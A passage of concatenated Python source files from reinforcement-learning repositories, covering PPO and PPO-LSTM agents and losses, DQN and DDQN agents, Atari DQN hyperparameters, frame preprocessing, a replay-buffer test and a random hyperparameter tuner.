value_head_hidden_sizes,
num_actions
)
net_init, net_apply = hk.without_apply_rng(hk.transform(net_fn))
init_state_fn = ppo_lstm_init_state(lstm_sizes)
_, initial_state_apply = hk.without_apply_rng(hk.transform(init_state_fn))
def initial_state(batch_size):
# convinience function which handles passing in the network params
# argument, which can be None since it's not used in the function
h = initial_state_apply(None, batch_size)
return h
return PPOLSTMNetwork(
apply=net_apply,
init=net_init,
initial_state=initial_state
)
```
#### File: rljaxff/ppo/functions.py
```python
import jax.numpy as jnp
def clipped_ppo_policy_loss(predicted_log_pi: jnp.ndarray,
sampled_log_pi: jnp.ndarray,
advantage: jnp.ndarray,
clip_range: float) -> jnp.ndarray:
"""Clipped PPO policy loss """
ratio = jnp.exp(predicted_log_pi - sampled_log_pi)
clipped_ratio = jnp.clip(ratio, 1-clip_range, 1+clip_range)
losses = jnp.minimum(ratio * advantage, clipped_ratio * advantage)
return -jnp.mean(losses)
def clipped_ppo_value_fn_loss(predicted_value: jnp.ndarray,
sampled_value: jnp.ndarray,
sampled_return: jnp.ndarray,
clip_range: float) -> jnp.ndarray:
"""Clipped PPO value function loss """
# clip the value function so that change in value is within clip distance
# of value estimate from current value fn
clipped_value = sampled_value + jnp.clip(
predicted_value - sampled_value, -clip_range, clip_range
)
return 0.5 * jnp.mean((clipped_value - sampled_return)**2)
```
#### File: rljaxforfun/rljaxff/replay_test.py
```python
import collections
import chex
import numpy as np
from absl.testing import absltest
from rljaxff import parts
from rljaxff import replay as replay_lib
Pair = collections.namedtuple("Pair", ['a', 'b'])
class TransitionReplayTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.capacity = 10
self.replay = replay_lib.TransitionReplay(
capacity=self.capacity,
structure=Pair(a=None, b=None),
random_state=np.random.RandomState(1)
)
self.items = [
Pair(a=1, b=2),
Pair(a=11, b=22),
Pair(a=111, b=222),
Pair(a=1111, b=2222),
]
for item in self.items:
self.replay.add(item)
def test_size(self):
self.assertLen(self.items, self.replay.size)
def test_capacity(self):
self.assertEqual(self.capacity, self.replay.capacity)
def test_sample(self):
num_samples = 2
samples = self.replay.sample(num_samples)
chex.assert_shape(samples.a, (num_samples, ))
def test_sample2(self):
num_samples = 2
samples = self.replay.sample(num_samples)
valid_a_values = [p.a for p in self.items]
valid_b_values = [p.b for p in self.items]
valid_a = [a for a in samples.a if a in valid_a_values]
valid_b = [b for b in samples.b if b in valid_b_values]
self.assertEqual(num_samples, len(valid_a))
self.assertEqual(num_samples, len(valid_b))
class TransitionAccumulatorTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.transition_accumulator = replay_lib.TransitionAccumulator()
self.num_timesteps = 10
self.observation_dims = (10, 5)
self.discount = 0.99
self.timesteps = []
self.actions = []
for i in range(self.num_timesteps):
if i == 0:
step_type = parts.StepType.FIRST
elif i == self.num_timesteps - 1:
step_type = parts.StepType.LAST
else:
step_type = parts.StepType.MID
timestep = parts.Timestep(
step_type=step_type,
reward=parts.Reward(i),
discount=self.discount,
observation=np.array([i])
)
self.timesteps.append(timestep)
self.actions.append(parts.Action(i))
def test_reset(self):
self.transition_accumulator.reset()
self.assertEqual(self.transition_accumulator._timestep_tm1, None)
self.assertEqual(self.transition_accumulator._a_tm1, None)
def test_first_step(self):
transitions = self.transition_accumulator.step(
self.timesteps[0], self.actions[0]
)
self.assertEqual([], list(transitions))
def test_mid(self):
n = self.num_timesteps // 2
for i in range(n + 1):
transitions = list(self.transition_accumulator.step(
self.timesteps[i], self.actions[i]
))
transition = transitions[0]
t_t = self.timesteps[n]
t_tm1 = self.timesteps[n-1]
a_tm1 = self.actions[n-1]
self.assertEqual(t_tm1.observation, transition.s_tm1)
self.assertEqual(a_tm1, transition.a_tm1)
self.assertEqual(t_t.reward, transition.r_t)
self.assertEqual(t_t.discount, transition.discount_t)
self.assertEqual(t_t.observation, transition.s_t)
if __name__ == "__main__":
absltest.main()
``` |
{
"source": "Jjschwartz/rltorch",
"score": 2
} |
#### File: policy_gradients/PPOLSTM/agent.py
```python
import gym
import time
import numpy as np
from pprint import pprint
import torch
import torch.nn as nn
import torch.optim as optim
from .buffer import PPOBuffer
from .model import PPOLSTMActorCritic
from rltorch.utils.rl_logger import RLLogger
class PPOLSTMAgent:
def __init__(self, **kwargs):
print("\nPPO with config:")
pprint(kwargs)
self.seed = kwargs["seed"]
torch.manual_seed(self.seed)
np.random.seed(self.seed)
self.env_name = kwargs["env_name"]
self.env = gym.make(self.env_name)
self.num_actions = self.env.action_space.n
self.obs_dim = self.env.observation_space.shape
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(f"Using device={self.device}")
self.logger = RLLogger(self.env_name, "ppolstm")
self.setup_logger()
# Hyper params
self.steps_per_epoch = kwargs["epoch_steps"]
self.epochs = kwargs["epochs"]
self.max_ep_len = kwargs["max_ep_len"]
self.clip_ratio = kwargs["clip_ratio"]
self.target_kl = kwargs["target_kl"]
self.train_actor_iters = kwargs["train_actor_iters"]
self.train_critic_iters = kwargs["train_critic_iters"]
self.model_save_freq = kwargs["model_save_freq"]
self.buffer = PPOBuffer(self.steps_per_epoch, self.obs_dim, kwargs["hidden_size"],
kwargs["gamma"], kwargs["lam"], self.device)
self.actor_critic = PPOLSTMActorCritic(self.obs_dim[0], kwargs["hidden_size"], self.num_actions)
self.actor_critic.to(self.device)
print("\nActorCritic:")
print(self.actor_critic)
self.actor_optimizer = optim.Adam(self.actor_critic.actor.parameters(), lr=kwargs["actor_lr"])
self.critic_optimizer = optim.Adam(self.actor_critic.critic.parameters(), lr=kwargs["critic_lr"])
self.critic_loss_fn = nn.MSELoss()
def setup_logger(self):
# adds headers of interest
self.logger.add_header("epoch")
self.logger.add_header("total_steps")
self.logger.add_header("avg_ep_return")
self.logger.add_header("min_ep_return")
self.logger.add_header("max_ep_return")
self.logger.add_header("avg_vals")
self.logger.add_header("min_vals")
self.logger.add_header("max_vals")
self.logger.add_header("avg_ep_len")
self.logger.add_header("actor_loss")
self.logger.add_header("actor_loss_delta")
self.logger.add_header("critic_loss")
self.logger.add_header("critic_loss_delta")
self.logger.add_header("kl")
self.logger.add_header("entropy")
self.logger.add_header("time")
def get_action(self, obs, hid):
return self.actor_critic.act(obs, hid)
def compute_actor_loss(self, data):
obs, act, adv, logp_old = data["obs"], data["act"], data["adv"], data["logp"]
hid = data["actor_hid"]
pi, logp, _ = self.actor_critic.actor.step(obs, act, hid)
logp = logp.squeeze()
ratio = torch.exp(logp - logp_old)
clipped_ratio = torch.clamp(ratio, 1-self.clip_ratio, 1+self.clip_ratio)
clip_adv = clipped_ratio * adv
actor_loss = -(torch.min(ratio * adv, clip_adv)).mean()
actor_loss_info = dict()
actor_loss_info["kl"] = (logp_old - logp).mean().item()
actor_loss_info["entropy"] = pi.entropy().mean().item()
return actor_loss, actor_loss_info
def compute_critic_loss(self, data):
obs, ret, hid = data["obs"], data["ret"], data["critic_hid"]
predicted_val, _ = self.actor_critic.critic.forward(obs, hid)
predicted_val = predicted_val.squeeze()
return self.critic_loss_fn(predicted_val, ret)
def optimize(self):
data = self.buffer.get()
actor_loss_start, actor_loss_info_start = self.compute_actor_loss(data)
actor_loss_start = actor_loss_start.item()
critic_loss_start = self.compute_critic_loss(data).item()
for i in range(self.train_actor_iters):
self.actor_optimizer.zero_grad()
actor_loss, actor_loss_info = self.compute_actor_loss(data)
if actor_loss_info["kl"] > 1.5*self.target_kl:
break
actor_loss.backward()
self.actor_optimizer.step()
for i in range(self.train_critic_iters):
self.critic_optimizer.zero_grad()
critic_loss = self.compute_critic_loss(data)
critic_loss.backward()
self.critic_optimizer.step()
# calculate changes in loss, for logging
actor_loss_delta = (actor_loss.item() - actor_loss_start)
critic_loss_delta = (critic_loss.item() - critic_loss_start)
self.logger.log("actor_loss", actor_loss_start)
self.logger.log("actor_loss_delta", actor_loss_delta)
self.logger.log("critic_loss", critic_loss_start)
self.logger.log("critic_loss_delta", critic_loss_delta)
self.logger.log("kl", actor_loss_info_start["kl"])
self.logger.log("entropy", actor_loss_info_start["entropy"])
def step(self, obs, actor_hid, critic_hid):
return self.actor_critic.step(self.process_single_obs(obs), actor_hid, critic_hid)
def get_value(self, obs, critic_hid):
return self.actor_critic.get_value(self.process_single_obs(obs), critic_hid)
def process_single_obs(self, obs):
proc_obs = torch.from_numpy(obs).float().to(self.device)
proc_obs = proc_obs.view(1, 1, -1)
return proc_obs
def train(self):
print("PPO Starting training")
start_time = time.time()
for epoch in range(self.epochs):
self.logger.log("epoch", epoch)
o = self.env.reset()
epoch_ep_rets = []
epoch_ep_lens = []
ep_ret, ep_len = 0, 0
epoch_vals = []
actor_hid, critic_hid = self.actor_critic.get_init_hidden()
for t in range(self.steps_per_epoch):
a, v, logp, next_actor_hid, next_critic_hid = self.step(o, actor_hid, critic_hid)
next_o, r, d, _ = self.env.step(a.squeeze())
ep_len += 1
ep_ret += r
epoch_vals.append(v)
self.buffer.store(o, a, r, v, logp, actor_hid, critic_hid)
o = next_o
actor_hid = next_actor_hid
critic_hid = next_critic_hid
timeout = ep_len == self.max_ep_len
terminal = timeout or d
epoch_ended = t == self.steps_per_epoch-1
if terminal or epoch_ended:
v = 0
if timeout or epoch_ended:
v, next_critic_hid = self.get_value(o, critic_hid)
self.buffer.finish_path(v)
if terminal:
epoch_ep_rets.append(ep_ret)
epoch_ep_lens.append(ep_len)
ep_ret, ep_len = 0, 0
o = self.env.reset()
actor_hid, critic_hid = self.actor_critic.get_init_hidden()
# update the model
self.optimize()
# save model
if (epoch+1) % self.model_save_freq == 0:
print(f"Epoch {epoch+1}: saving model")
save_path = self.logger.get_save_path("pth")
self.actor_critic.save_AC(save_path)
self.logger.log("total_steps", (epoch+1)*self.steps_per_epoch)
self.logger.log("avg_ep_return", np.mean(epoch_ep_rets))
self.logger.log("min_ep_return", np.min(epoch_ep_rets))
self.logger.log("max_ep_return", np.max(epoch_ep_rets))
self.logger.log("avg_vals", np.mean(epoch_vals))
self.logger.log("min_vals", np.min(epoch_vals))
self.logger.log("max_vals", np.max(epoch_vals))
self.logger.log("avg_ep_len", np.mean(epoch_ep_lens))
self.logger.log("time", time.time()-start_time)
self.logger.flush(display=True)
print("PPO Training complete")
```
#### File: policy_gradients/PPOLSTM/model.py
```python
import torch
import torch.nn as nn
from torch.distributions.categorical import Categorical
class PPOLSTMActor(nn.Module):
def __init__(self, input_dim, hidden_size, num_actions, output_activation):
super().__init__()
self.hidden_size = hidden_size
self.lstm = nn.LSTM(input_dim, hidden_size)
self.out = nn.Linear(hidden_size, num_actions)
self.output_activation = output_activation()
def get_init_hidden(self, batch_size=1):
return (torch.randn(1, batch_size, self.hidden_size),
torch.randn(1, batch_size, self.hidden_size))
def forward(self, x, hidden):
x, hidden = self.lstm(x, hidden)
x = self.output_activation(self.out(x))
return x, hidden
def get_pi(self, x, hidden):
x, hidden = self.forward(x, hidden)
return Categorical(logits=x), hidden
def get_logp(self, pi, act):
log_p = pi.log_prob(act)
return log_p
def step(self, obs, act, hidden):
pi, hidden = self.get_pi(obs, hidden)
logp_a = self.get_logp(pi, act)
return pi, logp_a, hidden
class PPOLSTMCritic(nn.Module):
def __init__(self, input_dim, hidden_size, output_activation):
super().__init__()
self.hidden_size = hidden_size
self.lstm = nn.LSTM(input_dim, hidden_size)
self.out = nn.Linear(hidden_size, 1)
self.output_activation = output_activation()
def get_init_hidden(self, batch_size=1):
return (torch.randn(1, batch_size, self.hidden_size),
torch.randn(1, batch_size, self.hidden_size))
def forward(self, x, hidden):
x, hidden = self.lstm(x, hidden)
x = self.output_activation(self.out(x))
# removes last dimension
return torch.squeeze(x, -1), hidden
class PPOLSTMActorCritic(nn.Module):
def __init__(self, obs_dim, hidden_size, num_actions, output_activation=nn.Identity):
super().__init__()
self.actor = PPOLSTMActor(obs_dim, hidden_size, num_actions, output_activation)
self.critic = PPOLSTMCritic(obs_dim, hidden_size, output_activation)
def get_init_hidden(self):
return self.actor.get_init_hidden(), self.critic.get_init_hidden()
def step(self, obs, hidden_actor, hidden_critic):
with torch.no_grad():
pi, new_hidden_actor = self.actor.get_pi(obs, hidden_actor)
a = pi.sample()
logp_a = self.actor.get_logp(pi, a)
v, new_hidden_critic = self.critic(obs, hidden_critic)
return a.numpy(), v.numpy(), logp_a.numpy(), new_hidden_actor, new_hidden_critic
def act(self, obs, hidden):
with torch.no_grad():
obs = obs.view(1, 1, -1)
pi, new_hidden = self.actor.get_pi(obs, hidden)
a = pi.sample()
return a.numpy(), (new_hidden[0].numpy(), new_hidden[1].numpy())
def get_value(self, obs, hidden):
with torch.no_grad():
v, new_hidden = self.critic(obs, hidden)
return v.numpy(), (new_hidden[0].numpy(), new_hidden[1].numpy())
def save_AC(self, file_path):
torch.save(self.state_dict(), file_path)
def load_AC(self, file_path):
torch.load_state_dict(torch.load(file_path))
```
#### File: policy_gradients/PPO/model.py
```python
import torch
import torch.nn as nn
from torch.distributions.categorical import Categorical
class PPOActor(nn.Module):
def __init__(self, input_dim, hidden_sizes, num_actions, activation, output_activation):
super().__init__()
layers = [nn.Linear(input_dim[0], hidden_sizes[0]), activation()]
for l in range(1, len(hidden_sizes)):
layers.append(nn.Linear(hidden_sizes[l-1], hidden_sizes[l]))
layers.append(activation())
layers.append(nn.Linear(hidden_sizes[-1], num_actions))
layers.append(output_activation())
self.net = nn.Sequential(*layers)
def forward(self, x, act=None):
pi = self.get_pi(x)
logp_a = None
if act is not None:
logp_a = self.get_logp(pi, act)
return pi, logp_a
def get_pi(self, obs):
return Categorical(logits=self.net(obs))
def get_logp(self, pi, act):
log_p = pi.log_prob(act)
return log_p
def step(self, obs, act):
"""
Returns
-------
pi : a distribution over actions
logp_a : log likelihood of given action 'act' under pi
"""
pi = self.get_pi(obs)
logp_a = self.get_logp(pi, act)
return pi, logp_a
class PPOCritic(nn.Module):
def __init__(self, input_dim, hidden_sizes, activation, output_activation):
super().__init__()
layers = [nn.Linear(input_dim[0], hidden_sizes[0]), activation()]
for l in range(1, len(hidden_sizes)):
layers.append(nn.Linear(hidden_sizes[l-1], hidden_sizes[l]))
layers.append(activation())
layers.append(nn.Linear(hidden_sizes[-1], 1))
layers.append(output_activation())
self.net = nn.Sequential(*layers)
def forward(self, x):
# removes last dimension
return torch.squeeze(self.net(x), -1)
class PPOActorCritic(nn.Module):
def __init__(self, obs_dim, hidden_sizes, num_actions,
activation=nn.Tanh, output_activation=nn.Identity):
super().__init__()
self.actor = PPOActor(obs_dim, hidden_sizes, num_actions, activation, output_activation)
self.critic = PPOCritic(obs_dim, hidden_sizes, activation, output_activation)
def step(self, obs):
with torch.no_grad():
pi = self.actor.get_pi(obs)
a = pi.sample()
logp_a = self.actor.get_logp(pi, a)
v = self.critic(obs)
return a.numpy(), v.numpy(), logp_a.numpy()
def act(self, obs):
with torch.no_grad():
return self.actor.get_pi(obs).numpy()
def get_value(self, obs):
with torch.no_grad():
return self.critic(obs).numpy()
def save_AC(self, file_path):
torch.save(self.state_dict(), file_path)
def load_AC(self, file_path):
torch.load_state_dict(torch.load(file_path))
```
#### File: q_learning/DQN/agent.py
```python
import torch
import torch.nn as nn
import torch.optim as optim
from .model import DQN
from rltorch.algs.q_learning.base.replay import ReplayMemory
from rltorch.algs.q_learning.base.agent import QLearningBaseAgent
class DQNAgent(QLearningBaseAgent):
"""The vanilla DQN Agent (with no target network) """
def __init__(self, name="DQN", **kwargs):
super().__init__(name, **kwargs)
if self.seed:
torch.manual_seed(self.seed)
# Neural Network related attributes
self.device = torch.device("cuda"
if torch.cuda.is_available()
else "cpu")
print(f"Using device={self.device}")
self.network_update_freq = kwargs["network_update_freq"]
self.dqn = DQN(self.obs_dim,
kwargs["hidden_sizes"],
self.num_actions).to(self.device)
print(self.dqn)
self.optimizer = optim.Adam(self.dqn.parameters(), lr=self.lr)
print(self.optimizer)
self.loss_fn = nn.SmoothL1Loss()
# replay
self.replay = ReplayMemory(kwargs["replay_size"],
self.obs_dim,
self.device)
self.updates_done = 0
def get_action(self, o):
o = torch.from_numpy(o).float().to(self.device)
return self.dqn.get_action(o).cpu().item()
def optimize(self):
if self.steps_done % self.network_update_freq != 0:
return None
if self.steps_done < self.start_steps:
return 0, 0, 0, 0
batch = self.replay.sample_batch(self.batch_size)
s_batch, a_batch, next_s_batch, r_batch, d_batch = batch
# get q_vals for each state and the action performed in that state
q_vals_raw = self.dqn(s_batch)
q_vals = q_vals_raw.gather(1, a_batch).squeeze()
# get target q val = max val of next state
with torch.no_grad():
target_q_val_raw = self.dqn(next_s_batch)
target_q_val, _ = target_q_val_raw.max(1)
target = r_batch + self.discount*(1-d_batch)*target_q_val
# calculate loss
loss = self.loss_fn(q_vals, target)
# optimize the model
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
self.updates_done += 1
q_vals_max = q_vals_raw.max(1)[0]
mean_v = q_vals_max.mean().item()
max_v = q_vals.max().item()
mean_td_error = (target - q_vals).abs().mean().item()
return loss.item(), mean_v, max_v, mean_td_error
def save_model(self):
save_path = self.logger.get_save_path(ext=".pth")
self.dqn.save_DQN(save_path)
def store(self, o, a, next_o, r, d):
self.replay.store(o, a, next_o, r, d)
```
#### File: papers/DQN/ddqn_agent.py
```python
import torch
from .dqn_agent import DQNAgent
from rltorch.papers.DQN.hyperparams import AtariHyperparams as hp
class DDQNAgent(DQNAgent):
def optimize(self):
if self.steps_done % hp.NETWORK_UPDATE_FREQUENCY != 0:
return None
if self.steps_done < hp.REPLAY_START_SIZE:
return 0, 0, 0, 0
batch = self.replay.sample_batch(hp.MINIBATCH_SIZE)
s_batch, a_batch, next_s_batch, r_batch, d_batch = batch
q_vals_raw = self.dqn(s_batch)
q_vals = q_vals_raw.gather(1, a_batch).squeeze()
with torch.no_grad():
next_s_q_vals = self.dqn(next_s_batch)
max_a_next_s = next_s_q_vals.max(1)[1].unsqueeze(1)
target_q_val_raw = self.target_dqn(next_s_batch)
target_q_vals = target_q_val_raw.gather(1, max_a_next_s).squeeze()
target = r_batch + (1-d_batch)*hp.DISCOUNT*target_q_vals
loss = self.loss_fn(target, q_vals)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
self.updates_done += 1
if self.updates_done % hp.TARGET_NETWORK_UPDATE_FREQ == 0:
self.update_target_net()
mean_v = q_vals_raw.max(1)[0].mean().item()
max_v = q_vals.max().item()
mean_td_error = (target - q_vals).abs().mean().item()
return loss.item(), mean_v, max_v, mean_td_error
```
#### File: papers/DQN/hyperparams.py
```python
import numpy as np
import torch.optim as optim
from .model import DQN, DuelingDQN
class AtariHyperparams:
ALGO = "DQN"
SEED = 2
LOG_DISPLAY_FREQ = 10
# Image sizing
WIDTH = 84
HEIGHT = 84
# Number of most recent frames given as input to Q-network
AGENT_HISTORY = 4
STATE_DIMS = (AGENT_HISTORY, WIDTH, HEIGHT)
NORMALIZE = False
DISCOUNT = 0.99
MINIBATCH_SIZE = 32
REPLAY_SIZE = int(1e6)
REPLAY_S_DTYPE = np.uint8
# Number of network updates between target network updates
# TARGET_NETWORK_UPDATE_FREQ = 10000
TARGET_NETWORK_UPDATE_FREQ = 2500 # every 10000 frames
# Number of times an action is repeated, i.e. number of frames skipped
ACTION_REPEAT = 4
# Num actions (ignoring repeats) performed before Gradient descent update
NETWORK_UPDATE_FREQUENCY = 4
# Parameters for network learning
OPTIMIZER = optim.RMSprop
LEARNING_RATE = 0.00025
GRADIENT_MOMENTUM = 0.95
SQUARED_GRADIENT_MOMENTUM = 0.95
MIN_SQUARED_GRADIENT = 0.01
OPTIMIZER_KWARGS = {
"lr": LEARNING_RATE,
"momentum": GRADIENT_MOMENTUM,
"eps": MIN_SQUARED_GRADIENT
}
GRAD_CLIP = [-1, 1]
# for reward
R_CLIP = [-1, 1]
# Exploration
EXPLORATION_SCHEDULE = "Linear"
INITIAL_EXPLORATION = 1.0
FINAL_EXPLORATION = 0.1
FINAL_EXPLORATION_FRAME = 1000000
# Number of frames to run random policy and before learning starts
REPLAY_START_SIZE = 50000
# Max number of "do nothing" actions to be performed at start of episode
NO_OP_MAX = 30
# Network architecture
INPUT_DIMS = (WIDTH, HEIGHT, AGENT_HISTORY)
LAYER_1 = {"type": "convolutional",
"filters": 32, "kernel_size": (8, 8),
"stride": 4, "activation": "relu"}
LAYER_2 = {"type": "convolutional",
"filters": 64, "kernel_size": (4, 4),
"stride": 2, "activation": "relu"}
LAYER_3 = {"type": "convolutional",
"filters": 64, "kernel_size": (3, 3),
"stride": 1, "activation": "relu"}
LAYER_4 = {"type": "fully_connected",
"size": 512, "activation": "relu"}
OUTPUT = {"type": "fully_connected"}
MODEL = DQN
# training duration (50 million)
TRAINING_FRAMES = int(5e7)
# Other hyperparams not related to paper
# Model Save Freq
MODEL_SAVE_FREQ = int(1e6)
# Evaluation
EVAL_FREQ = int(1e6)
EVAL_STEPS = 125000
EVAL_EPSILON = 0.05
@classmethod
def set_seed(cls, seed):
cls.SEED = seed
@classmethod
def set_mode(cls, mode='dqn'):
if mode == "testing":
print("WARNING: using test hyperparams")
input("Press any key to continue..")
cls.ALGO += "_test"
cls.REPLAY_SIZE = int(1e4)
cls.REPLAY_START_SIZE = 100
cls.INITIAL_EXPLORATION = 0.1
cls.TARGET_NETWORK_UPDATE_FREQ = 1000
cls.EVAL_FREQ = 2000
cls.EVAL_STEPS = 1000
cls.MODEL_SAVE_FREQ = 2500
cls.LOG_DISPLAY_FREQ = 1
cls.MINIBATCH_SIZE = 12
elif mode == "eval":
cls.ALGO += "_eval"
cls.REPLAY_SIZE = int(1e4)
elif mode == "ddqn":
print("Using DDQN hyperparams")
cls.ALGO = "DDQN"
elif mode == "ddqn-tuned":
print("Using DDQN-Tuned hyperparams")
cls.ALGO = "DDQN-Tuned"
cls.TARGET_NETWORK_UPDATE_FREQ = 30000
cls.FINAL_EXPLORATION = 0.01
cls.EVAL_EPSILON = 0.001
elif mode == "dqn":
print("Using DQN hyperparams")
pass
elif mode == "duelingdqn":
print("Using Dueling DQN hyperparams")
cls.ALGO = "DuelingDQN"
cls.MODEL = DuelingDQN
elif mode == "normalized":
print("Using normalized observations")
cls.NORMALIZE = True
cls.REPLAY_S_DTYPE = np.float16
elif mode == "pong_tuned":
print("Using pong tuned hyperparams")
cls.REPLAY_SIZE = 100000
cls.REPLAY_START_SIZE = 10000
cls.INITIAL_EXPLORATION = 1.0
cls.FINAL_EXPLORATION = 0.02
cls.FINAL_EXPLORATION_FRAME = 100000
# this corresponds to updating every 1000 frames
cls.TARGET_NETWORK_UPDATE_FREQ = 250
cls.OPTIMIZER = optim.Adam
cls.OPTIMIZER_KWARGS = {"lr": 1e-4}
else:
raise ValueError("Unsupported Hyper param mode")
@classmethod
def get_all_hyperparams(cls):
all_kwargs = {}
for k, v in cls.__dict__.items():
if not any([k.startswith("__"),
isinstance(v, classmethod)]):
all_kwargs[k] = v
return all_kwargs
```
#### File: papers/DQN/preprocess.py
```python
import time
import numpy as np
from PIL import Image
import multiprocessing as mp
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
class ImageProcessor:
def __init__(self, resized_height, resized_width):
self.resized_height = resized_height
self.resized_width = resized_width
def process_frames(self, f1, f2):
# 1. take maximum pixel values over two frames
max_frame = np.maximum(f1, f2)
# 2. resize image
img = Image.fromarray(max_frame)
img = img.resize((self.resized_width, self.resized_height))
# 3. convert image to grey scale
img = img.convert(mode="L")
x = np.asarray(img)
return x
def debug(self, f1, f2):
raw1 = Image.fromarray(f1)
raw2 = Image.fromarray(f2)
processed = self.process_frames(f1, f2)
processed = Image.fromarray(processed)
raw1.show("raw1")
raw2.show("raw2")
processed.show("processed")
def show_image(self, x, wait_for_user=True):
img = Image.fromarray(x)
img.show()
if wait_for_user:
input("Press any key..")
def show_stacked(self, x_stacked, wait_for_user=True):
for i in range(x_stacked.shape[0]):
self.show_image(x_stacked[i], False)
time.sleep(0.01)
if wait_for_user:
input("Press any key..")
class ImageHistory:
def __init__(self, history_length, img_dims):
self.length = history_length
self.img_dims = img_dims
self.history = np.empty((history_length, *img_dims), dtype=np.float32)
self.size, self.ptr = 0, 0
def push(self, x):
self.history[self.ptr] = x
self.ptr = (self.ptr + 1) % self.length
self.size = min(self.size+1, self.length)
def get(self):
assert self.size == self.length
# must add 1 for N dim for DQN
history_buffer = np.empty((1, self.length, *self.img_dims),
dtype=np.float32)
history_buffer[0][:self.length-self.ptr] = self.history[self.ptr:]
history_buffer[0][self.length-self.ptr:] = self.history[:self.ptr]
return history_buffer
def clear(self):
self.size, self.ptr = 0, 0
def run_animation(args):
"""To be run on seperate process """
img_queue, img_dims, img_min, img_max = args
fig = plt.figure()
tmp_img = Image.fromarray(np.ones((img_dims)))
im = plt.imshow(tmp_img, cmap='gray', vmin=0, vmax=255)
def _anim_init():
im.set_data(tmp_img)
return [im]
def _anim_func(i):
while img_queue.empty():
time.sleep(0.1)
x = Image.fromarray(img_queue.get())
im.set_array(x)
img_queue.task_done()
return [im]
anim = FuncAnimation(fig,
_anim_func,
init_func=_anim_init,
interval=1,
blit=True)
plt.show()
class ImageAnimation:
def __init__(self, img_dims=(84, 84), img_min=0, img_max=255):
self.queue = mp.JoinableQueue()
self.anim_proc = None
self.img_dims = img_dims
self.img_min = img_min
self.img_max = img_max
def start(self):
args = (self.queue, self.img_dims, self.img_min, self.img_max)
self.anim_proc = mp.Process(target=run_animation,
args=(args,))
self.anim_proc.start()
def add_image(self, x):
self.queue.put(x)
def stop(self):
self.queue.join()
self.anim_proc.join()
```
#### File: rltorch/tuner/random_tuner.py
```python
import random
import numpy as np
import multiprocessing as mp
from rltorch.tuner.tuner import Tuner
class RandomTuner(Tuner):
"""Takes an algorithm and lists of hyperparam values and runs
random hyperparameter search.
The tuner will run the specified number of experiments, selecting a
new random hyperparameter from the provided options each time.
"""
def __init__(self, num_exps, name='', seeds=[0]):
"""
Arguments
---------
num_exps : int
number of different experiment runs to conduct
"""
super().__init__(name, seeds)
self.num_exps = num_exps
def add_dist(self, key, dist, shorthand=None, default=None):
"""Add a new hyperparam with a callable distribution that can be used
to sample a value.
Arguments
---------
key : str
name of the hyperparameter (must match arg name in alg function)
dist : callable
distribution to sample from
shorthand : str, optional
optional shorthand name for hyperparam (if none, one is made
from first three letters of key)
default : varied, optional
optional default value to use for hyperparam. If not provided,
defaults to first value in vals list.
"""
assert callable(dist), \
"Dist must be callable. Use add method for lists of values"
if key == "seed":
print("Warning: Seeds already added to experiment so ignoring this"
" hyperparameter addition.")
return
self._check_key(key)
shorthand = self._handle_shorthand(key, shorthand)
self.keys.append(key)
self.vals.append(dist)
self.shs.append(shorthand)
self.default_vals.append(dist if default is None else default)
def _run(self, agent_cls, num_cpu):
""" Run each variant in the grid with algorithm """
# construct all variants at start since np.random.seed is set
# each time algo is run which messes with random sampling
variants = []
for i in range(self.num_exps):
var = self.sample_next_variant()
var_name = self.name_variant(var)
variants.append((i, var_name, var, agent_cls))
with mp.Pool(num_cpu) as p:
p.map(self._run_variant, variants)
def sample_next_variant(self):
"""Randomly samples next variant. """
variant = {}
for k, v in zip(self.keys, self.vals):
if callable(v):
sampled_val = v()
else:
sampled_val = random.choice(v)
variant[k] = sampled_val
return variant
def get_num_exps(self):
return self.num_exps
if __name__ == "__main__":
num_exps = 16
tuner = RandomTuner(num_exps, name="Test", seeds=5)
tuner.add("one", [1, 2])
tuner.add("two", [0.01, 0.0004])
tuner.add("three", [True, False])
tuner.add_dist("four", lambda: np.random.uniform(0, 1), "fr", 0.5)
tuner.add_dist("five", lambda: 10, "fv", 3)
tuner.print_info()
for i in range(num_exps):
var = tuner.sample_next_variant()
print(tuner.name_variant(var), ":", var)
```
#### File: rltorch/tuner/tuner.py
```python
import numpy as np
import os.path as osp
from prettytable import PrettyTable
LINE_WIDTH = 80
def call_experiment(agent_cls, exp_name, seed=0, **kwargs):
"""Run an algorithm with hyperparameters (kwargs), plus configuration
Arguments
---------
agent : Agent
callable algorithm function
exp_name : str
name for experiment
seed : int
random number generator seed
**kwargs : dict
all kwargs to pass to algo
"""
# in case seed not in passed kwargs dict
kwargs['seed'] = seed
kwargs["exp_name"] = exp_name
# print experiment details
table = PrettyTable()
print("\nRunning experiment: {}".format(exp_name))
table.field_names = ["Hyperparameter", "Value"]
for k, v in kwargs.items():
table.add_row([k, v])
print("\n", table, "\n")
agent = agent_cls(**kwargs)
agent.train()
class Tuner:
"""Abstract base class for specific hyperparam search algorithms
Subclasses must implement:
- _run
"""
line = "\n" + "-"*LINE_WIDTH + "\n"
thick_line = "\n" + "="*LINE_WIDTH + "\n"
def __init__(self, name='', seeds=[0]):
"""
Arguments
---------
name : str
name for the experiment. This is used when naming files
seeds : int or list
the seeds to use for runs.
If it is a scalar this is taken to be the number of runs and
so will use all seeds up to scalar
"""
assert isinstance(name, str), "Name has to be string"
assert isinstance(seeds, (list, int)), \
"Seeds must be a int or list of ints"
self.name = name
self.keys = []
self.vals = []
self.default_vals = []
self.shs = []
if isinstance(seeds, int):
self.seeds = list(range(seeds))
else:
self.seeds = seeds
def run(self, agent_cls, num_cpu=1):
"""Run the tuner.
Note assumes:
1. environment is also passed by user as a hyperparam
Arguments
---------
agent_cls : Class
the agent class to run
num_cpu : int
number of cpus to use
"""
self.print_info()
self._run(agent_cls, num_cpu)
def _run(self, agent_cls, num_cpu=1):
raise NotImplementedError
def add(self, key, vals, shorthand=None, default=None):
"""Add a new hyperparam with given values and optional shorthand name
Arguments
---------
key : str
name of the hyperparameter (must match arg name in alg function)
vals : list
values for hyperparameter
shorthand : str, optional
optional shorthand name for hyperparam (if none, one is made
from first three letters of key)
default : variable, optional
optional default value to use for hyperparam. If not
provided, defaults to first value in vals list.
"""
if key == "seed":
print("Warning: Seeds already added to experiment so ignoring "
"this hyperparameter addition.")
return
self._check_key(key)
